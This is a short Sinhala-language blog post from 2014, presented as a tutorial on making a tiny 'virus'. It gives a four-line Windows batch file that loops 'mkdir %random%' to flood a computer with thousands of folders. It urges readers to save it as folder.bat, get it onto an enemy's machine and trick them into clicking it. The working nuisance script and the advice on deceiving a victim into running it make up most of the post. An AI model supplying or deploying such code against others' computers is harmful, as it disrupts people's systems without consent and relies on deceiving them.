ජනප්‍රිය පෝස්ටු

Vishwajith Weerasinghe විසින් පළ කරන ලදී Thursday, January 23, 2014


මේ තමයි වෛරස් ගැන දාන 02 පෝස්ට් එක..තවත් පුංචිම පුංචි වෛරස් එකක් හදන හැටි..


මේ වෛරස් එකට තියෙන්නෙ කේත පේළි 04යි.ඒත් ඒකෙන් කෙරෙන වැඩේ නම් පොඩි නෑ..බලන්නකො යට තියෙන screenshot එක.විනාඩියකටත් අඩු කාලෙකින් folders 3000  විතර හදා ගන්න පුළුවන්.මේක වෛරස් එකක් වෙන්නෙ කොහොමද කියල ඔයාලට හිතේවි.මෙන්න මෙහෙමයි වෙන්නෙ.මේක desktop එකේ click කරොත් folders 3000 විතර හැදෙනවා.එතකොට මක් වෙයිද?


මේ කෝඩ් ටික නෝට්පෑඩ් එකේ ටයිප් කරල folder.bat කියල save කරගන්න.ඔයාගෙ හතුරෙක්ගෙ machine එකට කොහොම හරි යවාගන්න.මොකක් හරි බයිලයක් 02ක් කියල මේ file එක click කරවගෙන බලන්න..ඔන්න මාට්ටු වුණොත් මංනං නැතෝ..

@echo off
:loop
mkdir %random%
goto loop


- Copyright © VimasumSoft - Date A Live - Powered by Blogger - Designed by Johanes Djogan -